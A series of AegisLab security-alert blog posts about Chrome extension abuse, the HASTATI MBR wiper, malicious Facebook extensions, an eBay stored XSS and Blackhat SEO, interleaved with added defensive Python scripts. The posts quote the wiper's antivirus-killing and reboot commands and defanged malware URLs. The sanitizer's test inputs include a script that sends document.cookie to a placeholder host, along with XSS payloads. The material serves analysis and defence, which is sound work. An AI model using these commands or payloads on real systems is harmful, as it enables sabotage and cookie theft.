[ Security Alert ] 26 March, 2013 15:45

    Several weeks ago, all security researchers failed to crack Google's Chrome OS at CanSecWest Pwnium 3 in Vancouver, even though the deadline was extended from 2pm to 5pm at the researchers' request. But, unfortunately, the Chrome browser was compromised by MWR Labs at Pwn2Own 2013, which was sponsored by HP and Google. This contest proves that Google Chrome was vulnerable.

The following is our analysis of Chrome browser security:

    Chrome browser was developed by Google and is now one of the most popular web browsers in the world. It includes Google search, YouTube and many Google proprietary services. For personalization, the Chrome Web Store provides abundant extensions to modify and enhance the functionality of the Chrome browser.

    Extensions are small software programs that bundle all their files (manifest.json, pictures, JS and CSS...) into a single file that the user downloads and installs. This bundling means that, unlike ordinary web apps, extensions don't need to depend on content from the web.

manifest.json provides important information including name, description, version, language and permissions...

The following code shows the supported manifest fields. (http://developer.chrome.com/extensions/manifest.html)

The only fields that are always required are name and version. Here we take content_scripts, permissions and update_url to explain their attributes and functions as follows:

content_scripts: JavaScript files that run in the context of web pages. By using the standard Document Object Model (DOM), they can read details of the web pages the browser visits, or make changes to them.

update_url: sets the URL used for update checking.

permissions: To use most chrome.* APIs and extension capabilities, your extension must declare its intent in the manifest, often in the "permissions" field. For example, Google Mail Checker must have the following 2 permissions:

1. access your data on *google.com

2. access your tabs and browsing activity

    A user might see a dialog requesting permissions when installing an extension. If the permissions are improperly assigned and the content_scripts include malicious code, the extension can do anything to your system.

    For example: a malicious extension auto-posts and spreads malicious links on Facebook (Security Alert 2013-02-06: Watch out for Facebook video link). Also, the malicious extension will auto-update through its "update_url" setting to switch to other hacking jobs.

    Chrome browser has supported extensions since version 4.0. Extensions were easy to develop, but also easy to exploit. Old versions of Google Chrome permitted related extensions to be set up automatically when a Windows application was installed. This made it easy to install malicious extensions on a victim's system without the user's permission.

    So, Google Chrome enhanced extension management from version 25.0. Only extensions from the Chrome Web Store are available and there is no more automatic installation. Every extension must be permitted by the user before installation. However, there can be no assurance that all extensions in the Chrome Web Store are secure.

    On Facebook, the attacker pretends to be the victim's friend and shares attractive themes to lure the victim into clicking the hyperlink and installing the malicious extension. Then the victim will post many malicious links to his friends. So the malicious extension spreads constantly through the victims' curiosity. The victim misunderstands, thinking his account was stolen, and changes his password, but that does not work. The victim has to remove the malicious extension from the Chrome browser.

    For a more detailed scenario, please refer to our previous posts:

Security Alert 2013-02-06: Watch out for Facebook video link

Security Alert 2013-02-22: Malicious Chrome extensions

    Web browser plug-ins are additional pieces of software that add extra capabilities to your web browser, such as the ability to view movies, run Java applets, or see Flash animations. Unfortunately, since plug-ins run with all the privileges of real applications, they can do absolutely anything to your computer. In the past year, many 0-day vulnerabilities were reported in Java, and many security experts strongly recommend disabling it.

    As seen from the above analysis, extensions and plug-ins are two vulnerable points in the Chrome browser. To make Chrome more secure, the Google Web Store should inspect all extensions strictly; moreover, we would like to remind our customers:

1. Do not install any extensions from untrusted sources.

2. Check whether the permission request is normal when installing an extension.

3. Do not install unnecessary plug-ins if possible. If you have any plug-ins installed, keep them up to date.

by AegisLab

[ Security Alert ] 21 March, 2013 15:33

  As many of you probably know, several South Korean banks and local media organizations have been impacted by a critical cyber attack. All the victim machines no longer boot.

AegisLab has obtained the virus samples from the crash of the computer networks of major South Korean banks and TV broadcasters.

According to the sample we obtained, the virus overwrites the system's MBR (Master Boot Record) with the string "HASTATI".

The partition table was also destroyed.
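For responders who have imaged an affected disk, the damage described above can be confirmed offline by decoding the first sector. The following Python script is an added example written for this post, not AegisLab's own tooling: it parses the classic MBR layout (boot code, four 16-byte partition entries at offset 446, 0x55AA signature at offset 510) and reports whether the sector carries the "HASTATI" marker, a missing boot signature, or an unusable partition table. The two sample sectors are constructed here for illustration; the wiped one imitates the reported overwrite by filling the whole sector with the marker string.

```python
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 446
PARTITION_ENTRY_SIZE = 16
BOOT_SIGNATURE = b"\x55\xaa"
WIPER_MARKER = b"HASTATI"  # string the post reports written over the MBR


def parse_partition_table(sector: bytes) -> list:
    """Decode the four 16-byte partition entries of a classic MBR."""
    entries = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + i * PARTITION_ENTRY_SIZE
        raw = sector[off:off + PARTITION_ENTRY_SIZE]
        # status (1) | CHS start (3) | type (1) | CHS end (3) | LBA start (4) | sector count (4)
        status, ptype, lba_start, sectors = struct.unpack("<B3xB3xII", raw)
        entries.append({"status": status, "type": ptype,
                        "lba_start": lba_start, "sectors": sectors})
    return entries


def inspect_mbr(sector: bytes) -> dict:
    """Return findings for one 512-byte sector; 'bootable' is True only when nothing is wrong."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly one 512-byte sector")
    findings = []
    if sector.startswith(WIPER_MARKER):
        findings.append("boot code overwritten with HASTATI marker")
    if sector[510:512] != BOOT_SIGNATURE:
        findings.append("boot signature 0x55AA missing")
    table = parse_partition_table(sector)
    if all(e["type"] == 0 and e["sectors"] == 0 for e in table):
        findings.append("partition table empty or zeroed")
    for i, e in enumerate(table):
        # A valid entry is either inactive (0x00) or bootable (0x80); anything else is garbage.
        if e["status"] not in (0x00, 0x80):
            findings.append(f"partition entry {i} has invalid status byte 0x{e['status']:02x}")
    return {"bootable": not findings, "findings": findings, "partitions": table}


def inspect_image(path: str) -> dict:
    """Read the first sector of a raw disk image (or device node) and inspect it."""
    with open(path, "rb") as fh:
        return inspect_mbr(fh.read(SECTOR_SIZE))


def build_healthy_mbr() -> bytes:
    """Constructed sample: dummy boot code, one active NTFS-type partition, valid signature."""
    sector = bytearray(SECTOR_SIZE)
    sector[0:3] = b"\xeb\x3c\x90"  # typical jump at the start of boot code
    entry = struct.pack("<B3xB3xII", 0x80, 0x07, 2048, 204800)
    sector[PARTITION_TABLE_OFFSET:PARTITION_TABLE_OFFSET + PARTITION_ENTRY_SIZE] = entry
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


def build_wiped_mbr() -> bytes:
    """Constructed sample imitating the reported damage: the marker repeated across the whole sector."""
    repeats = SECTOR_SIZE // len(WIPER_MARKER) + 1
    return (WIPER_MARKER * repeats)[:SECTOR_SIZE]


if __name__ == "__main__":
    for label, sector in (("healthy", build_healthy_mbr()), ("wiped", build_wiped_mbr())):
        result = inspect_mbr(sector)
        print(f"{label}: bootable={result['bootable']}")
        for f in result["findings"]:
            print("  -", f)
```

On a real image, call inspect_image() with the path to the raw dump; the wiped sample reports the marker, the missing signature and four invalid partition entries, which matches the symptoms the post describes.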

The virus includes 3 jobs as follows:

1. taskkill /F /IM pasvc.exe => terminate "AhnLab Policy Agent" (top anti-virus software in South Korea)

2. taskkill /F /IM Clisvc.exe => terminate "ViRobot" (famous anti-virus software in South Korea)

3. shutdown -r -t 0  => reboot immediately  

Obviously, the attack was focused on South Korea.

After executing "shutdown -r -t 0", the blue screen of death appears...

reboot and then...

For your internet security, we urge our anti-virus customers to keep signatures up to date.

by AegisLab

[ Security Alert ] 22 February, 2013 16:17

Following our previous post, we have found some malicious extensions for the Chrome browser that turn Likes into real results on Facebook.

Once you click the malicious links embedded in spam mail, messages or any hyperlinks, and download the extension, the malware monitors your browser activity. If you are logged into Facebook with the Chrome browser, it will GET hxxp://goo.gl/iiWeL? (also hxxp://fastotolike.com/yeni.php!)

The content of son.js in the extension is as follows:

There are two functions, abone and sayfa2, in "hxxp://fastotolike.com/yeni.php"; the partial content is below:

The function abone tracks someone:

The function sayfa2 turns on Likes for someone:

Why did the malware turn Likes on Facebook? As we know, "On underground forums in Russia, a page with 100,000 likes sells for about $150 to $200", a security researcher said. Yes, for the money, obviously.

For your internet browsing security and to prevent malicious connections, we urge our customers to keep the WebGuard signature up to date.

by AegisLab

[ Security Alert ] 06 February, 2013 13:45

AegisLab got some malicious video links from Facebook, as follows:

hxxp://www.facebook.com/pages/Videos-choquantes/115875135259062?sk=app_208195102528120

hxxp://www.facebook.com/pages/Videos-choquantes/116032281910520?sk=app_208195102528120

They all take advantage of your curiosity about an unknown video, and lure you into executing a malicious package.

The analysis is below:

The subject is "This girl has a spider under the skin and makes it removed!" and the messages shown in the pop-up window are:

Update Needed

to watch the latest videos on Facebookyou must install this update package.

To begin, click on the button below:  

Obviously, the devil wants to lure you into executing the malware.

If the "OK" button is clicked, you'll get a malicious file: hxxp://dl-b.uni.me/updates/fr_FR /fb13.4.4_fr.exe

After running this file, the message "update already done" is shown in a pop-up window as follows:

And then the Chrome browser had one more extension added:

The content of this extension:

A Chrome extension is defined by its manifest.json, and this extension had malicious scripts injected.

Analyzing manifest.json, we found:

1. permissions: allow connection to any URL

2. main program: call.js

3. malicious URL for update: http://du-pont.info/updates/fr_FR/update.xml
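The three findings above are exactly the manifest fields explained in our 26 March post (permissions, content_scripts and update_url), so they can be checked mechanically before an extension directory is trusted. The following Python script is an added example for both passages, not AegisLab's or Google's code: it reads a manifest.json and flags host permissions that cover every URL, sensitive chrome.* permissions such as tabs, content scripts injected into all pages, and an update_url that is not HTTPS or is not served from the Chrome Web Store update host (clients2.google.com). The two manifests embedded below are constructed for illustration; the first resembles the Google Mail Checker permissions described earlier, the second mirrors the findings above with a placeholder update host.

```python
import json
from urllib.parse import urlparse

WEB_STORE_UPDATE_HOST = "clients2.google.com"  # host of the Chrome Web Store update service
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
SENSITIVE_PERMISSIONS = {"tabs", "history", "cookies", "webRequest",
                         "webRequestBlocking", "management"}


def review_manifest(manifest: dict) -> list:
    """Return a list of (severity, message) findings for a parsed manifest.json."""
    findings = []
    for p in manifest.get("permissions", []):
        if p in BROAD_HOST_PATTERNS:
            findings.append(("high", f"permissions: host access to every URL ({p})"))
        elif p in SENSITIVE_PERMISSIONS:
            findings.append(("medium", f"permissions: sensitive API '{p}' (confirm it is needed)"))
    for idx, cs in enumerate(manifest.get("content_scripts", [])):
        broad = [m for m in cs.get("matches", []) if m in BROAD_HOST_PATTERNS]
        if broad:
            findings.append(("high", f"content_scripts[{idx}]: injected into every page "
                                     f"({', '.join(broad)}) via {', '.join(cs.get('js', []))}"))
    url = manifest.get("update_url")
    if url:
        parsed = urlparse(url)
        if parsed.scheme != "https":
            findings.append(("high", f"update_url: updates fetched without HTTPS ({url})"))
        if parsed.hostname != WEB_STORE_UPDATE_HOST:
            findings.append(("high", f"update_url: served outside the Chrome Web Store "
                                     f"({parsed.hostname})"))
    return findings


def review_manifest_text(text: str) -> list:
    """Convenience wrapper: parse the manifest JSON text, then review it."""
    return review_manifest(json.loads(text))


def risk_level(findings: list) -> str:
    """Collapse findings to 'high', 'review' (only medium items) or 'low'."""
    if any(sev == "high" for sev, _ in findings):
        return "high"
    return "review" if findings else "low"


# Constructed sample resembling the Google Mail Checker permissions described in the 26 March post.
MAIL_CHECKER_MANIFEST = """{
  "name": "Mail Checker (sample)", "version": "1.0",
  "permissions": ["tabs", "*://*.google.com/"],
  "update_url": "https://clients2.google.com/service/update2/crx"
}"""

# Constructed sample mirroring the findings above; the update host is a placeholder, not a real site.
SUSPICIOUS_MANIFEST = """{
  "name": "Video Update (sample)", "version": "13.4.4",
  "permissions": ["<all_urls>", "tabs"],
  "content_scripts": [{"matches": ["*://*/*"], "js": ["son.js"]}],
  "background": {"scripts": ["call.js"]},
  "update_url": "http://update-host.example.invalid/updates/update.xml"
}"""


if __name__ == "__main__":
    for label, text in (("mail checker", MAIL_CHECKER_MANIFEST), ("suspicious", SUSPICIOUS_MANIFEST)):
        findings = review_manifest_text(text)
        print(f"{label}: risk={risk_level(findings)}")
        for sev, msg in findings:
            print(f"  [{sev}] {msg}")
```

To check an unpacked extension, read its manifest.json with open() and pass the text to review_manifest_text(); anything rated "high" deserves a look at the scripts named in the findings before the extension is allowed to stay installed.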

The partial main program call.js:

The malicious extension will collect your contacts on Facebook, add them as fans, and then spread malicious links to them.

The best way to lower the risk from malicious links is to check the browser's status bar before clicking the OK button, whenever possible.

For your internet browsing security and to prevent malicious connections, we urge our customers to keep the WebGuard signature up to date.

by AegisLab

 

[ Security Alert ] 16 November, 2012 11:27

An Indian security researcher, Shubham Upadhyay aka Cyb3R_Shubh4M, reported a new permanent XSS affecting the product listings on eBay.com.

AegisLab also tested it again immediately; so far, this vulnerability is still unfixed!!

Here is the page with the XSS injection code:

For this flaw, you need an eBay seller account: log in to your account on eBay and create a listing for sale. Then put XSS code into the HTML.

The news of XSS vulnerabilities is nothing new, but they are still so dangerous. What are the threats of XSS? Everything from account hijacking, shopping, payment, changing of user settings, cookie theft/poisoning, or false advertising is possible.
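A marketplace that lets sellers write HTML descriptions has to reduce that HTML to an allowlist before storing or rendering it; that is what prevents a listing from becoming a permanent XSS. The following Python script is an added example written for this post, not eBay's code or anything the researcher published: it uses the standard library html.parser to keep only simple formatting tags, keep only href/src/alt attributes, reject any link or image URL whose scheme is not http or https (so javascript: URLs are dropped, including entity-encoded or whitespace-padded spellings, because the parser decodes entities first), drop script and style blocks together with their contents, and re-escape all text. The sample listing fragments used in the test are constructed.

```python
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "p", "br", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
SAFE_URL_SCHEMES = {"http", "https"}
VOID_TAGS = {"br", "img"}
DROPPED_WITH_CONTENT = {"script", "style"}


def is_safe_url(value: str) -> bool:
    """Allow relative URLs and http(s) only; any other scheme (javascript:, data:, ...) is rejected."""
    compact = "".join(value.split()).lower()  # remove whitespace/newlines hidden inside the scheme
    first_segment = compact.split("/", 1)[0]
    if ":" not in first_segment:
        return True  # relative path or bare name, no scheme at all
    return first_segment.split(":", 1)[0] in SAFE_URL_SCHEMES


class ListingSanitizer(HTMLParser):
    """Rebuilds seller HTML from an allowlist; everything else is dropped or escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities are decoded before we see values
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROPPED_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: emit nothing, its text content still comes through handle_data
        kept = []
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # event handlers (onerror, onclick, ...) never reach here
            if name in ("href", "src") and not is_safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROPPED_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # text is always re-escaped


def sanitize_listing_html(raw: str) -> str:
    """Return the allowlisted version of a seller-supplied HTML description."""
    parser = ListingSanitizer()
    parser.feed(raw)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed listing fragments, not content from the report.
    samples = [
        '<p>Nice <b>shoes</b>, see <a href="https://example.com/pics">photos</a></p>',
        '<p>Great item</p><script>document.location="http://evil.invalid/?c="+document.cookie</script>',
        '<img src="x" onerror="alert(1)">',
        '<a href="JaVa&#9;ScRiPt:alert(document.cookie)">click</a>',
    ]
    for s in samples:
        print(repr(sanitize_listing_html(s)))
```

Apply the sanitizer once on input and store the result, so every page that later renders the description shows the same allowlisted HTML; comments and declarations are silently dropped by the parser callbacks this class does not override.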

by AegisLab

 

[ Security Alert ] 12 November, 2012 18:57

AegisLab found that the URL www.hv20.com/payroll/djia-finance.php was poisoned by Blackhat SEO.

The attack scenario is as follows:

Google search -> djia finance

-> hxxp://www.hv20.com/payroll/djia-finance.php

-> hopping site -> hxxp://78.159.118.51/in.cgi?10

-> the final download site -> hxxp://proddingappsumo.info/guaranteeing/means_phone- pool_occurs.php?tjn=33:2v:1h:2w:1m&wrgglxs=38&ciooh=33:30:32:2w:30:1n:31:1f:1m:1i&zuhy=1n:1d:1g:1d:1h:1d:1f

!! (attempt to download a malicious pdf file) !! 

Virustotal scan result (3/44): 

https://www.virustotal.com/file/e7c42a18ff9a8acdd4eb9f5808ec5bd5cafac1cd8ca6ac1ef6b71cdfe2106f67/analysis/1352442238/ 

According to our analysis and observation, this download site's URL format was made by Blackhole Exploit Kit 2.0.

So far, this "djia finance" Blackhat SEO poisoning is still alive and there is no warning message in Google search results.

AegisLab urges our customers to keep the WG signature at the latest version.


by AegisLab WG Team